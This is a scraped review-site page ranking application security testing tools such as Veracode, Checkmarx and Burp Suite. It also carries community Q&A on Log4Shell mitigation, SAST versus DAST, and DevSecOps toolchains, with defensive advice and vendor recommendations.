We changed our name from IT Central Station: Here's why

Top 8 Application Security Testing (AST) Tools

VeracodeCheckmarxPortSwigger Burp Suite ProfessionalMicro Focus Fortify on DemandGitLabOWASP ZapContrast Security AssessAcunetix by Invicti
  1. leader badge
    There is a single area on the dashboard where you can get a full view of all of the tests and the results from everything. There is a nice, very simple graphic that shows you the types of vulnerabilities that were found, their severity, the scoring, and in what part of the code they were found. All the details are together in one place.
  2. leader badge
    The solution is scalable, but other solutions are better.The solution has good performance, it is able to compute in 10 to 15 minutes.
  3. Find out what your peers are saying about Veracode, Checkmarx, PortSwigger and others in Application Security Testing (AST). Updated: January 2022.
    564,322 professionals have used our research since 2012.
  4. leader badge
    We use the solution for vulnerability assessment in respect of the application and the sites. The automated scan is what I find most useful because a lot of customers will need it. Not every domain will be looking for complete security, they just need a stamp on the security key. For these kinds of customers, the scan works really well.
  5. leader badge
    There is not one feature we find valuable. The idea is to integrate the solution in DevSecOps which we were able to do. We were working with a different solution called SolarCloud previously and it was limited. We are trying to find the right level of security for our needs.
  6. GitLab integrates well with other platforms.We like that we can have an all-encompassing product and don't have to implement different solutions.
  7. It has evolved over the years and recently in the last year they have added, HUD (Heads Up Display).They offer free access to some other tools.
  8. report
    Use our free recommendation engine to learn which Application Security Testing (AST) solutions are best for your needs.
    564,322 professionals have used our research since 2012.
  9. The solution is very accurate in identifying vulnerabilities. In cases where we are performing application assessment using Contrast Assess, and also using legacy application security testing tools, Contrast successfully identifies the same vulnerabilities that the other tools have identified but it also identifies significantly more. In addition, it has visibility into application components that other testing methodologies are unaware of.
  10. There is a lot of documentation on their website which makes setting it up and using it quite simple.Overall, it's a very good tool and a very good engine.

Advice From The Community

Read answers to top Application Security Testing (AST) questions. 564,322 professionals have gotten help from our community of experts.
Evgeny Belenky
Hi peers, I believe many of you have already heard of the recent Log4j/Log4Shell vulnerability that allows attackers to perform remote code execution (RCE). What does it mean for an organization? How can you check you're vulnerable and mitigate/patch it now, if at all? Lastly, what impact do you see this can have in the near future? Thanks
author avatarSimonClark

This vulnerability is particularly critical because Log4j is widely used in open source and commercial software and remote exploitation of the vulnerability against any internet-facing server is trivial using a single HTTP post. Exploitation results in full system compromise. The vulnerability has a CVSS Score of 10 out of a possible 10 meaning it is as bad as it gets.

Our SOC has launched a new app that detects the presence of vulnerable versions of Log4j however, detecting it does not mean you have been exploited.

My advice: Scan your network to get a full visibility report i.e. find all your legacy and shadow IT that you didn't know existed which means you should find all potential instances of Log4j, patch all of the Log4J environments, monitor your systems 24/7 using your SOC and if you don't have a SOC invest in a Managed SOC provider. 

author avatarITSecuri7cfd (IT Security Coordinator at a healthcare company with 10,001+ employees)
Real User

Yet another chance to test our incident response procedures. 

So far I would say we're a B. Good on the process, and an A on team response and interactions and reducing threat risk were about a B. 

ID'g your external assets exposed to this vulnerability is your teams' #1 priority and mitigate or patch (if available) the threat. 

You also have to notify and communicate with any 3rd party to make sure they're aware so they can start the same process. You ALSO need to be fully aware of your vendors' weaknesses and defenses (mitigations, patches, knowledge and reaction time). 

Then be prepared to roll out patches or in this case shut systems down OR put mitigations in place immediately to mitigate risk to the entire environment.

author avatarJairo Willian Pereira
Real User

One excellent opportunity for the company to test your CMDB/Inventory (at medium and big companies). 

Tenable, and I think, other Vulnerability Scanners offer a specific plugin used to check your infrastructure against Log4shell. 

If you don't have VS, you can try looking at your logging system for evidence or use:


In the future, Patch Mgmt pre-defined and applied schedules need to be first (proactive) from scanners/vulns. (reactive).

author avatarreviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)
Real User

WhiteSource has released a utility to detect log4j vulnerability in the codebase. 

Take a look at this if it helps. In our case, a lot of projects use Elastic Search and Azure DevOps Server - both of them have log4j being used and that's where additional fixes have to be done.


Charles Race
I'm choosing an Application Security Testing platform. My use cases are as follows: SAST DAST Component Scanning Vulnerability auditing  Mitigation What product/solution would you recommend and why? 
author avatarThomas Ryan

The first thing you'd want to do is:

1. Look at your application inventory to determine the language and framework coverage.

2. The following would be what has the developer integrations with my current and future state CI/CD toolset, Developer IDE's

3. Do I have the security team to support it? Helps determine vendor and approach. I say Fortify as they are the only Hybrid (Cloud and OnPremise) approach. 

4. Does this need to be Cloud or On-Premise?

My most successful customers have used the following:

  • SAST - Hybrid of Fortify on-premise and Fortify on Demand, if support is needed for Perl or Groovy, buy some CheckMarx to cover that gap and Correlate findings with Saltworks SaltMiner.

  • DAST - WebInspect/ScanCentral & Fortify on Demand

  • Component Scanning - The most successful deployments have been with SonaType due to the Fortify integration. Blackduck, WhiteSource, and Snyk also manage plugins to Fortify SSC. If there is no budget, use OWASP Dependency Track to build your use case for a more robust Composition Analysis tool.

  • Vulnerability auditing - Done within Fortify SSC or Fortify OnDemand

  • Mitigation - Your Team, but if consulting is needed I would recommend Saltworks Security, Deloitte, Accenture & Cigital which have a reputation for managing Fortify programs.

Ping me if you need further guidance.

author avatarSivaKrishna
Real User

The best application security testing platforms include GitHub, GitLab, HCL AppScan, Netsparker, Acunetix Vulnerability Scanner, Pentest-Tools.com, Detectify Deep Scan, Appknox, Checkmarx, and Micro Focus Fortify On Demand. 

author avatarVishalDhamke
Real User

SAST - Veracode, goes well with integration

DAST - Either Microfocus Webinspect or Burp Suite Professional or OWASP ZAP (Open Source)

Component Scanning - Blackduck or Sonatype Nexus Platform or Whitesource Bolt 

Vulnerability Auditing - Nessus & CIS - CAT ( Assessor Pro) or Qualys

Mitigation -  Team effort, for Security Orchestration  - Threadfix or ZeroNorth

author avatarreviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)
Real User

Hello @Charles Race,

A lot of responses already on this one. Considerations will include on-premises vs SaaS, one tool vs modular approach to using different tools. I will share some additional details

1. Snyk: It can do SAST, SCA, Containers, IaaC scripts - all 4. They have 4 products as part of their SaaS platform. It's commercial and has an open-source version with limited capabilities. Their on-premises scanner is in private beta

2. Clouddefense.AI: It can do SAST, DAST, SCA, etc. Commercial SaaS Platform. Uses ZAP rules behind the scenes for DAST

3. Synopsys: Great product, the leader in Gartner MQ 2021. Can do IAST as well.

4. SonarQube Enterprise Licensed Deployment is an excellent product for SAST. It supports 27+ languages including SQL, strong reporting capabilities, trend analysis.

If you need to do CSPM (Cloud Security Posture Management), you will need to look at others like Prisma Cloud.

Hope this helps.

author avatarRogerio Goncalves

Hi my name is Rogerio from Xmart Solutions Brazil (we are an independent consultancy that represents several AST solutions). Some factors are important to be evaluated such as: 

How many SAST applications (static analysis) and how often will you do the analysis? How many analyzes (URLs) will you do dynamically?

What are your sprints? Do you have internal development or third parties? 

Which languages ​​from your legacy? How will you implement integrations? What tools?

Would you like to have everything automated?

These are just a few questions for your decision.

I hope I've contributed.

author avatarRaghavendra Rao PV

I suggest go for a Secure SDLC approach by integrating security at each level of the development life cycle. If you are constrained to select just one from the above then start with DAST. As it helps simulate realtime attacks on your production application and thus helps you address the most glaring issues.

author avatarW_K

Kiuwan - scan for 3rd party libs

SonarQube - CD\CI integration with low price

author avatarCuneyt KALPAKOGLU Phd.
Real User

I would like you to buy CHECKMARX as a SAST TOOL and have a look to KONDUKTO which embeds security tests into DevOps pipelines in an automated fashion using both open source and commercial security tools.                                  Vulnerabilities coming from different sources, be it from penetration tests, bug bounty programs or automated tools can be managed in a single platform to provide a unified view. With its unique process automation and CI/CD integration capabilities, Kondukto helps to scale AppSec effort and paves the way for DevSecOps.                                      My advice to pay attention the Visibility into vulnerabilities in native environments leads to improved security awareness among developers.

✔ Custom-tailored training programs based on the vulnerabilities created by each developer and team increase the ROI of training.

✔ Remediation database allows developers to benefit from the know-how accumulated in the company and fix vulnerabilities faster.

Hi, Many companies wonder whether SAST or DAST is better for application security testing.  What are the relative benefits of each methodology? Is it possible to make use of both?
author avatarDan Doggendorf

SAST and  DAST are not mutually exclusive and should be used in conjunction with each other.  One should be used by the developers to ensure security is being addressed as they are writing the code.  The other is used for evaluating existing applications already in production to ensure they are not susceptible to any new vulnerabilities that have been discovered.  

The real question is which should have a higher priority when it comes to introducing the concepts into your application security model.  Unfortunately, there is no single answer to which comes first.  It all depends on your organizations culture, business model, and your relationships with the various impacted groups.

author avatarThomas Ryan

The easiest way to remember the role of each:

SCA & SAST = Am I Vulnerable
DAST & IAST = Am I Exploitable (In some cases together, they compliment SAST)
RASP & WAF = Can I Protect Myself  (Fixing the code is the primary option)

author avatarOscar Van Der Meer

For application security you ideally need SAST, SCA and DAST. You need all three as they essentially measure different things:

SAST identifies bad coding practices that potentially could be exploited

SCA identifies known vulnerabilities in the libraries and components you are using and this is the main attack vector on applications.

DAST identifies some of the weaknesses that SAST and SCA identified, but also identifies weaknesses in the configuration. You might have the perfect application code with zero vulnerabilities, but if it is misconfigured, for instance using a default password, it still can be breached.

If you have to choose, look at SCA and then DATS first as that gives you the best bang for your buck from a risk reduction perspective

author avatarreviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)
Real User

Both SAST and DAST are complementary to each other.  The best approach is to include both SAST and DAST.

SAST: Inspects underlying source code, requires understanding of source design, Is  utilized early in the development cycle and the average cost to remediate issues is low

DAST: Requires the application running, performs hacker-like (black box) testing, 

Utilized much later in the development cycle and the average cost to remediate issues is higher

If we look at OWASP Top 10 2021 changes, SAST or DAST will not cover all of them individually. In addition, we also need SCA to be done to look at open source vulnerabilities.

author avatarCurtis Yanko (Shiftleft)

It’s a false choice of a question but DAST exist because folks don’t trust their SAST tool. DAST is good about true positives but bad about false negatives. SAST just has a reputation for false positives but a new generation of SAST tools do a much better job.

author avatarRussell Webster
Real User

Both. They are not in competition with each other.
SAST is used for analyzing your written code for practices and patterns that are risky or vulnerable.
DAST is used @ runtime for analyzing the app for vulnerabilities as shown in other ways on the runtime memory stack, etc.
Both provide different value.

Look into RASP vs DAST vs IAST as well.

What are the different types of tools that should be used together in DevSecOps? What are the specific tools that you like to use when working on your DevSecOps pipeline?  What is essential, and what is a nice-to-have? 
author avatarThomas Ryan

Everything in technology focuses on People, Process & Technology. What binds these together is business requirements and understanding the needs of each Line Of Business. Often each Line of Business requires completely different requirements, but what tools help you meet that unified vision and executive dashboard reporting to measure your KPIs.

  1. Code Repos – GitHub, GitLab

  2. Build Servers – Azure DevOps, Jenkins, Bamboo, TeamCIty

  3. Code Quality - SonarQube

  4. Software Composition Analysis (SCA) – Sonatype (Fortify Integration), Snyk, & BlackDuck

  5. Static Analysis (SAST) – Fortify On Premise, Fortify OnDemand (or Hybrid) CheckMarx (Fills the APEX, Perl, Groovy, etc.. gap that Fortify doesn’t cover)

  6. Infrastructure As Code (IaaC) – Aqua Security

  7. IAST – Not widely adapted due to agent limitations.

  8. DAST – WebInspect

    1. ScanCentral provides the most automation and scalability

    2. Highly Flexible API for Automation

  9. Metric Reporting – SaltMiner (Saltworks Security), Fortify SSC, Fortify OnDemand

  10. IDE (Eclipse, Visual Studio, JetBrains) – Fortify

  11. Continuous Monitoring - BitDiscovery

Why so much Fortify? It has been around 17 years, while it is old it is constantly evolving. It is the only Hybrid (Cloud & On-Premise Solution), it provides the flexibility needed for most customers. There is a reason why over 50% of Cigital (Synopsys) business is managing Fortify and not Synopsys tool suite. Deloitte, Accenture, IBM & Saltworks makes a lot of money managing Fortify. One thing you won’t hear from Gartner, Fortify SAST & DAST surpasses their competitors’ revenue by over 70%.

author avatarreviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)
Real User

I believe we need to cover the SDLC from start to end as much as possible while ensuring that this does not mean too many dashboards and also keeping the cost of development in mind.

1. IDE Checks: This is the 1st step in shift left approach. Many open source tools integrate easily with IDE (VSC, Eclipse) etc and allow developers to do a check even before they commit code on local branch. We have leveraged SonarLint (https://www.sonarlint.org/) which covers a vast spectrum of programming languages and IDEs.

2. SAST: Many open source tools available in this space which do a check around security vulnerability, security hotpots etc. We use SonarQube.

3. SCA: Check against open source security vulnerabilities and license compliance is very important. WhiteSource is what we use here.

4. IaaC scan: We need tools to manage and analyze infrastructure as code (IaC) scan results across platforms and be able to resolve the issues.

5. Monitoring: Once application is deployed into production, we need tools to monitor it live and be able to check for vulnerabilities and other issues which happen when 100's of users are using the application from across the globe.

There are other areas like DAST, IAST which become important depending on size, complexity and business needs.

author avatarRama Susarla
Real User

It depends on the budget, business and technology portfolio of the enterprise. 

If you predominantly web-based and service architecture-oriented technology portfolio, Veracode set of tools (Green-light, Veracode SAST, Veracode DAST) is a good option. Veracode is good if you have enterprise-level DevSecOps transformation. But Veracode may not work well for legacy systems. 

I have also used Microfocus Fortify effectively. Just on SCA, universally used Sonarqube with standard plugins is I prefer as it is easy to use. All these tools are very used to integrate into DevSecOps Application Pipeline.

author avatarJeremy Vaughan

Depends on budget and the larger approach to security, compliance, and risk. There are many solutions and approaches out there but many limit the ability to scale DevSecOps beyond an experiment and justify to business leaders. Standard response: SCA, SAST, DAST, IAST. Many of these tools are disconnected and some slow down performance quit a bit, especially your traditional household names. What are your goals and what are your constraints to developing a program?

author avatarSteve Arone

The detailed answers below are a good summary.  How are teams pulling all these tools together and orchestrating in terms of agile stories and feedback loops?  Azure DevOps, JIRA, ServiceNow, Other?

author avatarGiorgio Riva

Hi we think that is essential a tool for applying static analysis technologies for Code Quality and Security

Find out what your peers are saying about Veracode, Checkmarx, PortSwigger and others in Application Security Testing (AST). Updated: January 2022.
564,322 professionals have used our research since 2012.